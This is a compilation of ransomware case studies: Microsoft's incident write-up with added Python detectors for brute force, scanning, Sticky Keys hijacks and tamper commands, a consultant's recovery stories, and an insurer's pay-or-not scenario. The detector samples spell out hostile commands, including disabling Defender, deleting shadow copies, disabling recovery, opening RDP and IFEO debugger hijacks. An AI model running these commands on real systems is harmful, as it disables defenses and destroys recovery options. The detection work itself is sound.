
Microsoft Incident Response ransomware case study


Human-operated ransomware remains one of the most impactful cyberattack trends worldwide and a significant threat that many organizations have faced in recent years. These attacks take advantage of network misconfigurations and thrive on an organization's weak interior security. Although they pose a clear and present danger to organizations and their IT infrastructure and data, they are a preventable disaster.

The Microsoft Incident Response team (formerly DART/CRSP) responds to security compromises to help customers become cyber-resilient. Microsoft Incident Response provides onsite reactive incident response and remote proactive investigations. It draws on Microsoft's strategic partnerships with security organizations around the world and on internal Microsoft product groups to provide the most complete and thorough investigation possible.

This article describes how Microsoft Incident Response investigated a recent ransomware incident with details on the attack tactics and detection mechanisms.

See Part 1 and Part 2 of Microsoft Incident Response's guide to combatting human-operated ransomware for more information.

Microsoft Incident Response uses incident response tools and tactics to identify threat actor behaviors in human-operated ransomware cases. Public information about ransomware events focuses on the end impact but rarely highlights the details of the operation: how the threat actors escalated their access undetected in order to discover, monetize, and extort.

Here are some common techniques that attackers use in ransomware attacks, organized by MITRE ATT&CK tactic.

Common techniques that attackers use for ransomware attacks.

Microsoft Incident Response used Microsoft Defender for Endpoint to track the attacker through the environment, build a timeline of the incident, and then eradicate the threat and remediate. Once deployed, Defender for Endpoint began detecting successful logons that followed a brute-force attack. On discovering this, Microsoft Incident Response reviewed the security data and found several vulnerable Internet-facing devices exposing the Remote Desktop Protocol (RDP).

After initial access was gained, the threat actor used the Mimikatz credential harvesting tool to dump password hashes, scanned for credentials stored in plaintext, created backdoors through Sticky Keys manipulation, and moved laterally through the network using remote desktop sessions.

For this case study, here is the highlighted path that the attacker took.

The path the ransomware attacker took for this case study.

The following sections describe additional details based on the MITRE ATT&CK tactics and include examples of how the threat actor activities were detected with the Microsoft Defender portal.

Initial access

Ransomware campaigns use well-known weaknesses for their initial entry, typically phishing emails or gaps in perimeter defense such as devices with Remote Desktop enabled and exposed to the Internet.

For this incident, Microsoft Incident Response located a device that had TCP port 3389 (RDP) exposed to the Internet. This allowed the threat actors to perform a brute-force authentication attack and gain their initial foothold.

Defender for Endpoint used threat intelligence to determine that there were numerous sign-ins from known brute-force sources and displayed them in the Microsoft Defender portal. Here's an example.

An example of known brute-force sign-ins in the Microsoft Defender portal.
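The portal screenshot above relies on threat intelligence about known brute-force sources. The following added example (not code from the Microsoft case study) shows the behavioural version of the same detection: it walks a handful of constructed Windows Security event lines (event 4625 = failed logon, 4624 = successful logon, LogonType 10 = RemoteInteractive, i.e. RDP) and flags a source IP that accumulates many failures inside a short window and then obtains a successful logon. The one-line field layout of the sample events is an assumption made for the example, not a real export format; the IP addresses are documentation ranges.

```python
"""Detect an RDP brute force that ends in a successful logon.

Added example, not part of the Microsoft case study. It reads constructed
Windows Security event lines (4625 = failed logon, 4624 = successful logon,
LogonType 10 = RemoteInteractive, i.e. RDP) and flags a source IP that piles
up failures inside a short window and then gets a successful logon.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample. The one-line field layout is an assumption for this
# example, not the layout of a real event export. 203.0.113.45 is the
# brute-forcing source; 198.51.100.7 is a user who mistyped a password once.
SAMPLE_EVENTS = """\
2024-03-02T01:12:05Z EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.45
2024-03-02T01:12:09Z EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.45
2024-03-02T01:12:14Z EventID=4625 LogonType=3 TargetUserName=svc_backup IpAddress=10.0.0.5
2024-03-02T01:12:20Z EventID=4625 LogonType=10 TargetUserName=backup IpAddress=203.0.113.45
2024-03-02T01:12:31Z EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2024-03-02T01:12:44Z EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.7
2024-03-02T01:12:58Z EventID=4625 LogonType=10 TargetUserName=support IpAddress=203.0.113.45
2024-03-02T01:13:15Z EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=203.0.113.45
2024-03-02T01:13:40Z EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=203.0.113.45
2024-03-02T01:14:02Z EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=203.0.113.45
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)
RDP_LOGON_TYPE = 10


def parse_event(line):
    """Return a dict for one event line, or None if the line does not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "id": int(m["id"]),
        "logon_type": int(m["lt"]),
        "user": m["user"].lower(),
        "ip": m["ip"],
    }


def find_bruteforce_logons(lines, threshold=5, window=timedelta(minutes=10)):
    """Return (ip, user, failures_in_window, success_ts) for every successful
    RDP logon preceded by at least `threshold` failed RDP logons from the same
    IP inside `window`. Events must be in chronological order."""
    failures = defaultdict(deque)  # ip -> timestamps of recent 4625 events
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["logon_type"] != RDP_LOGON_TYPE:
            continue
        q = failures[ev["ip"]]
        while q and ev["ts"] - q[0] > window:  # drop failures older than the window
            q.popleft()
        if ev["id"] == 4625:
            q.append(ev["ts"])
        elif ev["id"] == 4624 and len(q) >= threshold:
            hits.append((ev["ip"], ev["user"], len(q), ev["ts"]))
            q.clear()  # one alert per burst
    return hits


if __name__ == "__main__":
    for ip, user, n, ts in find_bruteforce_logons(SAMPLE_EVENTS.splitlines()):
        print(f"{ts:%Y-%m-%d %H:%M:%S} {ip} logged on as {user} after {n} failed RDP attempts")
```

Only LogonType 10 is counted, so network (type 3) failures from service accounts do not pollute the per-IP counters, and the counter is cleared after an alert so a long spray produces one finding per successful break-in rather than one per subsequent logon. The window and threshold are the knobs to tune against your own baseline of mistyped passwords.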

Reconnaissance

Once initial access succeeded, environment enumeration and device discovery began. These activities let the threat actors learn about the organization's internal network and target critical systems such as domain controllers, backup servers, databases, and cloud resources. After enumeration and device discovery, the threat actors performed similar activities to identify vulnerable user accounts, groups, permissions, and software.

The threat actor used Advanced IP Scanner, an IP address scanning tool, to enumerate the IP addresses in use in the environment and then perform port scanning. By scanning for open ports, the threat actor discovered devices that were reachable from the initially compromised device.

This activity was detected in Defender for Endpoint and used as an indicator of compromise (IoC) for further investigation. Here's an example.

An example of port scanning in the Microsoft Defender portal.
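Whatever scanner is used, the sweep leaves the same signal in network connection telemetry: one source reaching many peers on many ports in a short time. The following added example (not code from the Microsoft case study) builds a constructed set of connection records and flags sources whose fan-out inside a five-minute window exceeds both a host and a port threshold. Addresses, timings and thresholds are assumptions made for the example.

```python
"""Flag internal hosts that fan out to many peers and ports in a short window.

Added example, not part of the Microsoft case study. The page says the actor
ran Advanced IP Scanner and then port-scanned; this shows the behavioural
signal that leaves in connection telemetry, independent of which scanner
produced it. Addresses and timings below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def build_sample_connections():
    """Constructed telemetry: (timestamp, source_ip, dest_ip, dest_port).
    10.10.5.23 sweeps 12 hosts on 10 ports; 10.10.5.40 is a normal workstation
    that only talks to a file server (445) and a domain controller (389)."""
    base = datetime(2024, 3, 2, 1, 30, 0)
    conns = []
    scan_ports = [22, 80, 135, 139, 443, 445, 1433, 3389, 5985, 8080]
    n = 0
    for host in range(1, 13):
        for port in scan_ports:
            conns.append((base + timedelta(seconds=n), "10.10.5.23", f"10.10.5.{host}", port))
            n += 1
    for i in range(30):
        conns.append((base + timedelta(seconds=5 * i), "10.10.5.40", "10.10.5.2", 445))
        conns.append((base + timedelta(seconds=5 * i + 1), "10.10.5.40", "10.10.5.1", 389))
    return conns


def detect_scanners(conns, window=timedelta(minutes=5), min_hosts=5, min_ports=8):
    """Return {source_ip: (distinct_hosts, distinct_ports)} for sources that,
    inside any `window`, touched at least `min_hosts` hosts AND `min_ports`
    ports. Requiring both cuts out chatty-but-normal hosts (many peers, one
    port) and single-host service probing (one peer, many ports)."""
    recent = defaultdict(deque)  # source -> (ts, dst, port) records inside the window
    flagged = {}
    for ts, src, dst, port in sorted(conns):
        q = recent[src]
        q.append((ts, dst, port))
        while ts - q[0][0] > window:
            q.popleft()
        hosts = {d for _, d, _ in q}
        ports = {p for _, _, p in q}
        if len(hosts) >= min_hosts and len(ports) >= min_ports:
            flagged[src] = (len(hosts), len(ports))  # fan-out at the last moment the threshold held
    return flagged


if __name__ == "__main__":
    for src, (hosts, ports) in detect_scanners(build_sample_connections()).items():
        print(f"{src}: {hosts} hosts x {ports} ports inside 5 minutes")
```

Vulnerability scanners, monitoring systems and backup servers will also trip this rule, so in practice the output is joined against an allowlist of known scanners; a workstation or a freshly compromised server appearing in it is the interesting case. Detecting the tool itself (process name or hash of Advanced IP Scanner) is simpler but only works while the actor keeps using that particular binary.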

Credential theft

After gaining initial access, the threat actors harvested credentials with the Mimikatz credential-dumping tool and by searching for files containing "password" on the initially compromised systems. These actions let them access additional systems with legitimate credentials. In many situations, threat actors use these accounts to create additional accounts, so that they keep persistence after the initially compromised accounts are identified and remediated.

Here's an example of the detected use of Mimikatz in the Microsoft Defender portal.

An example of Mimikatz detection in the Microsoft Defender portal.

Lateral movement

Movement across endpoints varies between organizations, but threat actors commonly use whatever remote management software already exists on the device. By using the same remote access methods that the IT department uses in its day-to-day activities, threat actors can fly under the radar for extended periods.

Using Microsoft Defender for Identity, Microsoft Incident Response was able to map out the path that the threat actor took between devices, displaying the accounts that were used and accessed. Here's an example.

The path that the threat actor took between devices in Microsoft Defender for Identity.

Defense evasion

Throughout the attack cycle, the threat actors used defense evasion techniques to avoid identification and achieve their objectives. These techniques include disabling or tampering with antivirus products, uninstalling or disabling security products or features, modifying firewall rules, and using obfuscation to hide the artifacts of an intrusion from security products and services.

The threat actor for this incident used PowerShell to disable real-time protection for Microsoft Defender on Windows 11 and Windows 10 devices, and local networking tools to open TCP port 3389 and allow RDP connections. These changes decreased the chances of detection because they modified the system services that detect and alert on malicious activity.

Defender for Endpoint, however, cannot be disabled from the local device, and it detected this activity. Here's an example.

An example of detecting the use of PowerShell to disable real-time protection for Microsoft Defender.

Persistence

Persistence techniques are the actions threat actors take to keep access to systems after security staff have made efforts to regain control of compromised systems.

The threat actors for this incident used the Sticky Keys hack, which makes Windows launch an attacker-chosen binary from the logon screen, locally or over RDP, without any authentication: the accessibility helper sethc.exe, which Windows starts when Shift is pressed five times, is either replaced or redirected to another program. They used this capability to launch a Command Prompt and perform further attacks.

Here's an example of the detection of the Sticky Keys hack in the Microsoft Defender portal.

An example of detecting the Sticky Keys hack in the Microsoft Defender portal.
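The registry variant of this hack leaves a fixed artifact: an Image File Execution Options (IFEO) "Debugger" value under the name of an accessibility binary. The following added example (not code from the Microsoft case study) parses a constructed `reg export` of that key and reports any accessibility binary with a Debugger value set. The export text, the list of binaries and the hypothetical paths in it are assumptions made for the example.

```python
"""Find Sticky Keys-style hijacks of accessibility binaries in a registry export.

Added example, not part of the Microsoft case study. The registry variant of
the Sticky Keys hack sets an Image File Execution Options (IFEO) "Debugger"
value for sethc.exe (or another accessibility binary) so that triggering it at
the logon screen, locally or over RDP, launches that program instead. The .reg
text below is constructed; the parser handles the quoted-string and dword value
forms that `reg export` writes.
"""
import re

ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
IFEO_PREFIX = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
               "\\Image File Execution Options\\").lower()

# Constructed export: two hijacked accessibility binaries and one benign IFEO entry.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200
"""

VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)+)"=(?P<val>.*)$')


def parse_reg_export(text):
    """Parse .reg text into {key_path: {value_name: value}}. Quoted strings have
    their backslash escapes undone, dword values become ints, and any other
    value type is kept as its raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue
        val = m["val"]
        if val.startswith('"') and val.endswith('"'):
            val = re.sub(r"\\(.)", r"\1", val[1:-1])  # \\ -> backslash, \" -> quote
        elif val.lower().startswith("dword:"):
            val = int(val[6:], 16)
        keys[current][m["name"]] = val
    return keys


def find_accessibility_hijacks(keys):
    """Return [(binary, debugger)] for accessibility binaries that carry an IFEO
    Debugger value. Legitimate software has no reason to set one on these."""
    findings = []
    for path, values in keys.items():
        low = path.lower()
        if not low.startswith(IFEO_PREFIX):
            continue
        binary = low[len(IFEO_PREFIX):]
        debugger = {k.lower(): v for k, v in values.items()}.get("debugger")
        if binary in ACCESSIBILITY_BINARIES and debugger is not None:
            findings.append((binary, debugger))
    return findings


if __name__ == "__main__":
    for binary, debugger in find_accessibility_hijacks(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"IFEO hijack: {binary} -> {debugger}")
```

The on-disk variant, where sethc.exe itself is overwritten with a copy of cmd.exe, is invisible to this check; for that, compare the file's Authenticode signature and hash against the genuine Windows binary, or hunt in process telemetry for cmd.exe or powershell.exe whose parent is winlogon.exe, which is what either variant produces at the logon screen.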

Threat actors typically encrypt files using applications or features that already exist within the environment. PsExec, Group Policy, and Microsoft Endpoint Configuration Manager are deployment methods that let an actor reach endpoints and systems quickly without disrupting normal operations.

The threat actor for this incident used PsExec to remotely launch an interactive PowerShell script from various remote shares. This method randomizes the distribution points and makes remediation more difficult during the final phase of the ransomware attack.

Ransomware execution

Ransomware execution is one of the primary methods a threat actor uses to monetize an attack. Regardless of the execution methodology, distinct ransomware families tend to share a common behavioral pattern once deployed:

  • Obfuscate threat actor actions
  • Establish persistence
  • Disable Windows error recovery and automatic repair
  • Stop a list of services
  • Terminate a list of processes
  • Delete shadow copies and backups
  • Encrypt files, potentially with custom exclusions
  • Drop a ransom note

Here's an example of a ransom note.

An example of a ransom note.
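Both the defense-evasion steps described earlier (disabling Defender real-time protection with PowerShell, opening TCP port 3389) and the recovery-inhibiting steps in the list above show up as process command lines, which is where Defender for Endpoint's process-creation telemetry catches them. The following added example (not code from the Microsoft case study) runs a small rule set over constructed process-creation records and rolls the hits up per host. The page names the behaviours but not the exact commands, so the commands in the sample (for instance `Set-MpPreference -DisableRealtimeMonitoring $true`, which tamper protection blocks when it is enabled) are the usual ones for each step; the host names and timestamps are assumptions.

```python
"""Match process command lines against the tamper and recovery-inhibit steps
that the defense-evasion and ransomware-execution sections describe.

Added example, not part of the Microsoft case study. Events are constructed
process-creation records (host, timestamp, command line); the commands are
the usual ones for each step. ATT&CK technique IDs are attached so findings
map onto the tactic columns used elsewhere in the article.
"""
import re

# (ATT&CK technique, tactic, description, regex over the command line)
RULES = [
    ("T1562.001", "defense-evasion", "Defender real-time protection disabled",
     r"set-mppreference\b.*-disablerealtimemonitoring\s+\$?true"),
    ("T1562.004", "defense-evasion", "Host firewall rule allowing TCP/3389 added",
     r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(?=.*\baction=allow\b)(?=.*\blocalport=3389\b)"),
    ("T1112", "defense-evasion", "RDP enabled through fDenyTSConnections=0",
     r"\breg(\.exe)?\s+add\b.*fdenytsconnections\b.*/d\s+0\b"),
    ("T1490", "impact", "Volume shadow copies deleted",
     r"(\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete)"),
    ("T1490", "impact", "Backup catalog deleted",
     r"\bwbadmin(\.exe)?\s+delete\s+catalog"),
    ("T1490", "impact", "Windows recovery / automatic repair disabled",
     r"\bbcdedit(\.exe)?\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("T1489", "impact", "Service stopped",
     r"\bnet(1)?(\.exe)?\s+stop\s+\S+"),
    ("T1569.002", "execution", "Remote execution through PsExec",
     r"\bpsexec(64)?(\.exe)?\b.*\\\\\S+"),
]
COMPILED = [(t, tac, d, re.compile(p, re.IGNORECASE)) for t, tac, d, p in RULES]

# Constructed process-creation records: (host, timestamp, command line).
SAMPLE_EVENTS = [
    ("WS-17", "2024-03-02T02:01:10Z",
     r'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ("WS-17", "2024-03-02T02:01:42Z",
     r'netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389'),
    ("WS-17", "2024-03-02T02:02:05Z",
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS-17", "2024-03-02T02:40:11Z",
     r'psexec.exe \\FILESRV01 -s -d powershell.exe -ExecutionPolicy Bypass -File \\FILESRV01\it$\deploy.ps1'),
    ("FILESRV01", "2024-03-02T02:40:30Z", r"vssadmin.exe delete shadows /all /quiet"),
    ("FILESRV01", "2024-03-02T02:40:31Z", r"bcdedit.exe /set {default} recoveryenabled No"),
    ("FILESRV01", "2024-03-02T02:40:33Z", r'net stop "SQL Server (MSSQLSERVER)" /y'),
    ("WS-22", "2024-03-02T09:15:00Z",
     r'netsh advfirewall firewall add rule name="Web" dir=in action=allow protocol=TCP localport=443'),
    ("WS-22", "2024-03-02T09:16:00Z", r'powershell.exe -Command "Get-MpPreference"'),
]


def match_rules(cmdline):
    """All rules that fire on one command line."""
    return [(t, tac, d) for t, tac, d, rx in COMPILED if rx.search(cmdline)]


def evaluate(events):
    """Return {host: [(timestamp, technique, tactic, description), ...]}."""
    findings = {}
    for host, ts, cmd in events:
        for t, tac, d in match_rules(cmd):
            findings.setdefault(host, []).append((ts, t, tac, d))
    return findings


def high_risk_hosts(findings):
    """Hosts with any impact-stage finding, or findings from two or more tactics
    (for example tooling disabled and then remote execution staged from the host)."""
    out = []
    for host, items in findings.items():
        tactics = {tac for _, _, tac, _ in items}
        if "impact" in tactics or len(tactics) >= 2:
            out.append(host)
    return sorted(out)


if __name__ == "__main__":
    results = evaluate(SAMPLE_EVENTS)
    for host in high_risk_hosts(results):
        for ts, technique, tactic, desc in results[host]:
            print(f"{host} {ts} {technique} [{tactic}] {desc}")
```

The patterns are deliberately loose (case-insensitive, optional `.exe`, argument order ignored for the firewall rule) because actors vary casing, paths and switch order. Administrators do occasionally run `vssadmin delete shadows` or stop services, so the per-host roll-up matters more than any single rule: a host that disables protection, opens RDP and then pushes a script with PsExec is the pattern the case study describes, and it is much rarer than any one of those commands on its own.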

Additional ransomware resources

Key information from Microsoft:

  • The growing threat of ransomware, Microsoft On the Issues blog post, July 20, 2021
  • Human-operated ransomware
  • Rapidly protect against ransomware and extortion
  • 2021 Microsoft Digital Defense Report (see pages 10-19)
  • Ransomware: A pervasive and ongoing threat, a threat analytics report in the Microsoft Defender portal
  • Microsoft Incident Response ransomware approach and best practices

Microsoft 365:

  • Deploy ransomware protection for your Microsoft 365 tenant
  • Maximize Ransomware Resiliency with Azure and Microsoft 365
  • Recover from a ransomware attack
  • Malware and ransomware protection
  • Protect your Windows 10 PC from ransomware
  • Handling ransomware in SharePoint Online
  • Threat analytics reports for ransomware in the Microsoft Defender portal

Microsoft Defender XDR:

  • Find ransomware with advanced hunting

Microsoft Defender for Cloud Apps:

  • Create anomaly detection policies in Defender for Cloud Apps

Microsoft Azure:

  • Azure Defenses for Ransomware Attack
  • Backup and restore plan to protect against ransomware
  • Help protect from ransomware with Microsoft Azure Backup (26 minute video)
  • Recovering from systemic identity compromise
  • Advanced multistage attack detection in Microsoft Sentinel
  • Fusion Detection for Ransomware in Microsoft Sentinel

Microsoft Security team blog posts:

  • 3 steps to prevent and recover from ransomware (September 2021)
  • A guide to combatting human-operated ransomware: Part 1 (September 2021): key steps in how Microsoft Incident Response conducts ransomware incident investigations
  • A guide to combatting human-operated ransomware: Part 2 (September 2021): recommendations and best practices
  • Becoming resilient by understanding cybersecurity risks: Part 4—navigating current threats (May 2021): see the Ransomware section
  • Human-operated ransomware attacks: A preventable disaster (March 2020): includes attack chain analyses of actual attacks
  • Ransomware response—to pay or not to pay? (December 2019)
  • Norsk Hydro responds to ransomware attack with transparency (December 2019)


Ransomware is malware that locks and encrypts a victim's data, files, devices or systems, rendering them inaccessible and unusable until the attacker receives a ransom payment. A ransomware attack can shut down a business for days, even weeks and -- even when the company pays the ransom -- there's no guarantee it will ever get its assets back, or that it won't be attacked again. This guide covers the history and basics of ransomware, identifies the most common targets and offers expert instructions on how to prevent an attack. Or, if the worst happens, how to recognize an attack's taken place and remove the ransomware as swiftly as possible.

Ransomware case study: Recovery can be painful

In ransomware attacks, backups can save the day and the data. Even so, recovery can still be expensive and painful, depending on the approach. Learn more in this case study.

Alissa Irei, Senior Site Editor

Seasoned IT consultant David Macias will never forget the day he visited a new client's website and watched in horror as it started automatically downloading ransomware before his eyes. He quickly disconnected his computer from the rest of the network, but not before the malware had encrypted 3 TB of data in a matter of seconds.

"I just couldn't believe it," said Macias, president and owner of ITRMS, a managed service provider in Riverside, Calif. "I'm an IT person, and I am [incredibly careful] about my security. I thought, 'How can this be happening to me?' I wasn't online gambling or shopping or going to any of the places you typically find this kind of stuff. I was just going to a website to help out a client, and bingo -- I got hit."

Macias received a message from the hackers demanding $800 in exchange for his data. "I told them they could go fly a kite," he said. He wiped his hard drive, performed a clean install and restored everything from backup. "I didn't lose anything other than about five days of work."

Ransomware case study: Attack #2

A few years later, another of Macias' clients -- the owner of a direct-mail printing service -- called to report he couldn't access his server. Macias logged into the network through a remote desktop and saw someone had broken through the firewall. "I told the client, 'Run as fast as you can and unplug all the computers in the network,'" he said. This short-circuited the attack, but the attacker still managed to encrypt the server, five out of 15 workstations and the local backup.


"What made this ransomware attack so bad was that it attacked the private partition that lets you restore the operating system," Macias added. Although the ransom demanded was again only $800, he advised against paying, since attackers often leave backdoors in a network and can return to steal data or demand more money.

Fortunately, Macias had a full image-based backup of the client's network saved to a cloud service. Even so, recovery was expensive, tedious and time-consuming. He had to reformat the hard drive manually, rebuild the server from scratch and reinstall every single network device. The process took about a week and a half and cost $15,000. "The client was just incredibly grateful that all their data was intact," Macias said.

Although pleased that the client's data loss was negligible, Macias wanted a more efficient, less painful disaster recovery strategy. Shortly after the second ransomware incident, he learned about a company called NeuShield that promised one-click backup restoration. He bought the technology for his own network and also sold it to the client that had been attacked. According to NeuShield, its Data Sentinel technology works by showing an attacker a mirror image of a computer's data, thus protecting the original files and maintaining access to them even if encryption takes place.

Ransomware case study: Attack #3

The printing services company experienced another ransomware incident a couple of years later, when its owner was working from home and using a remote desktop without a VPN. A malicious hacker gained entry through TCP port 3389 and deployed ransomware, encrypting critical data.

In this instance, however, Macias said NeuShield enabled him to restore the system with a simple click and reboot. "When they got hit the first time, it took forever to restore. The second time, they were back up and running in a matter of minutes," he said.

While he praised NeuShield's technology, Macias noted it doesn't negate the need for antivirus protection to guard against common malware threats or for cloud backup in case of fires, earthquakes or other disasters. "Unfortunately, there's no one-stop solution," he said. "I wish there was one product that included everything, but there isn't."

Macias said he knows from personal experience, however, that investing upfront can prevent massive losses down the road. "I've had clients tell me, 'I'll worry about it when it happens.' But that's like driving without insurance. Once you get into an accident, it's too late."


Surviving a Ransomware Attack: A Case Study

A project manager for ABC Inc., a manufacturer with $1 billion in annual revenue and operations in 30 countries, steps off the elevator at company headquarters. She's returning to her office after a lunch break and is eager to get back to work on a major order for a large client that is due next week. But something's wrong.

When she sits down at her desk, she sees that her computer does not seem to be functioning. Instead of the usual desktop image on her monitor, she sees a lock and a disturbing message:

Your files are encrypted. If you do not submit payment to us — $5 million in bitcoin — within three days, your files will be lost forever.

Worried, she calls ABC’s IT manager on the other side of the floor, but the IT manager and his staff are too busy to answer. Other employees around the world are reporting that procurement and shipping software is inaccessible. At the company’s factories in China, India, and elsewhere, assembly lines have come to a halt. And that same message is being seen on computers at every company office.

The company is a victim of ransomware, an attack that is growing more frequent, severe, and sophisticated.

A ransomware attack can disrupt a business for weeks, cost millions of dollars in downtime and restoration costs, and damage reputations. Millions more is often needed to pay the actual ransom. Personal information may also be exposed, resulting in significant costs for breach notification and credit monitoring. But with the right advisor and with effective planning and preparation, a business can weather the storm and take action to protect its operations, systems, revenue, and reputation.

Marsh can be that advisor to your organization, delivering recommendations before, during, and after an incident. Here’s how a ransomware attack can play out, and how we can help you manage its impacts on your organization.

To Pay or Not to Pay

As critical data is held hostage and systems are rendered inoperable, ABC finds itself in an untenable situation. Operations are completely halted; the technology that powers ABC’s manufacturing line is down. Employees cannot perform critical tasks — they cannot order components that go into their products, nor can they ship finished goods to customers.

With contractual obligations not being met and assembly lines idling, the company is losing money every hour, every minute, every second. And with the threat actor's deadline looming, ABC's risk management and leadership teams face a critical decision: Should we pay the ransom?

Several factors should go into this decision. These include the criticality of affected data and systems, availability and integrity of data backups, cost of the ransom versus the estimated cost of restoration, the likelihood of successful restoration (whether the ransom is paid or not), and regulatory implications.

Organizations should develop guidance regarding ransomware decision-making and build this into their incident response plans. Generally, choosing to pay or not requires careful consideration and input from key stakeholders, including in-house and outside legal counsel and vendors.

As ABC considers its options, it can rely on Marsh for help.

Scenario 1: Paying the Ransom

ABC makes the decision to pay the ransom after determining that restoring its systems, files, and data from its own resources is not possible, or not possible in time. ABC quickly engages a law firm with specific expertise in ransomware to serve as the incident response coordinator.

Computer forensic teams actively investigate the incident and try to determine its scope while working to limit the spread of the malware. Crisis management and public relations teams are engaged to manage reputational harm.

ABC, meanwhile, is also busy getting the necessary internal authorizations and working with third parties to prepare a cryptocurrency payment. Legal and regulatory checks must be performed, such as a review of whether payment is permissible under the rules of the Office of Foreign Assets Control (OFAC), which prohibits payments to certain sanctioned foreign parties.

A ransomware response vendor, meanwhile, begins negotiating with attackers on ABC’s behalf for a reduction in payment demands and a later deadline. The vendor’s specialists have seen this strain of ransomware before and understand how the threat actor group operates.

After initial communication with the threat actor group’s “PR department,” the vendor engages the threat actor group’s “finance department” and succeeds in extending the payment deadline and cutting the required payment to $2 million in bitcoin. The ransomware response firm also tests the decryption keys to make sure they work.

ABC is ready to make payment. The company works with its legal advisors and ransomware response vendor to make a bitcoin payment to the cyber-attackers four days after the ransomware message first appeared. In exchange, its IT team receives a decryption key to restore access to the network.

The work, however, is far from over. It may take weeks to deploy the decryption keys across ABC’s network and restore all impacted systems to full functionality. Additional forensics may be necessary to confirm there are no remnants of the malware, that backdoors are identified and eliminated, and that systems have been scrubbed clean.

Backups will need to be reconfigured and tested and data may need to be restored. To prevent incident reoccurrence, new hardware or software may also be needed as a part of reengineering IT systems and boundaries. The overall focus of reengineering is to improve the overall security environment and support improved cybersecurity monitoring.

ABC’s cyber insurance coverage, secured with the help of its brokers at Marsh, can prove useful. ABC’s cyber policy will reimburse the ransomware payment and cover the costs of the vendors that helped with the negotiation. Incident response, including attorney fees, PR expenses, and data restoration costs will also be covered, as is lost income during ABC’s downtime and extra expenses that might have been incurred to keep operating.

In addition to securing your cyber policy, Marsh can help you navigate the carrier's vendor and ransomware reimbursement consent requirements. And we can help you prepare a business interruption claim to ensure that you maximize your cyber insurance coverage.

As ABC returns to some semblance of normalcy, the assembly line once again begins to hum.

Scenario 2: Not Paying the Ransom

In ABC’s executive offices, the ransomware demand sparks heated debate. While some argue in favor of paying quickly to minimize the damage and resume operations as quickly as possible, company leadership ultimately concludes that the company will be able to make a near full recovery using its offline backups.

After engaging a ransomware response vendor, ABC also learns that these attackers hardly ever deliver a working decryption key. For these reasons, ABC decides not to pay the ransom.

Instead, ABC works with its advisors — including consultants from Marsh, experienced cyber legal counsel, forensic analysts, and others — to determine the extent of attackers’ presence within their networks and what data and systems may be compromised. Efforts are taken to contain the malware and to isolate and remediate impacted systems. Once the network is scrubbed clean, ABC then takes steps to restore backups and rebuild critical datasets.

ABC’s cyber insurance coverage can again prove useful, responding in many of the same ways as if the company had paid the ransom. Its policy provides coverage for incident response, data restoration, business interruption, and extra expenses.

One week after the ransomware message first appeared, ABC successfully starts restoring access to its core systems and backup data, though the process is still a long one. As ABC rebuilds its IT infrastructure, some legacy systems need to be replaced. While operations can resume as active monitoring for indicators of compromise (IoCs) continues, ABC is only operating at 50% capacity. Once the network is scrubbed clean and purged of malware, the company gradually increases its capacity to get back up and running again.

Three weeks out, factory operations resume at 100% capacity and affected employees fully return to work. ABC can once again focus on its core mission of delivering high-quality manufactured goods to its customers.

Managing Claims

With cyber insurance responding in either scenario, the next phase for ABC is to seek recovery.

With help from Marsh, which regularly communicated with insurers as the company responded to the ransomware attack, ABC's risk management team gets to work capturing loss estimates tied to its downtime following the attack and cataloguing the extra expenses incurred while responding. Documenting decisions about activities and resources during the incident, as they are made, is critical to ABC's successful claim development, and Marsh supports the process to help maximize insurance recovery.

Once this information is in hand, ABC provides its cyber insurer with a detailed submission. Ultimately, the company is able to recoup the reasonable and necessary costs from the incident — subject to self-insured retentions — under the terms of its well-crafted cyber insurance policy.

Post-Incident Steps

The ransomware attack is over; ABC has weathered the storm. But there’s still one final step in the process.

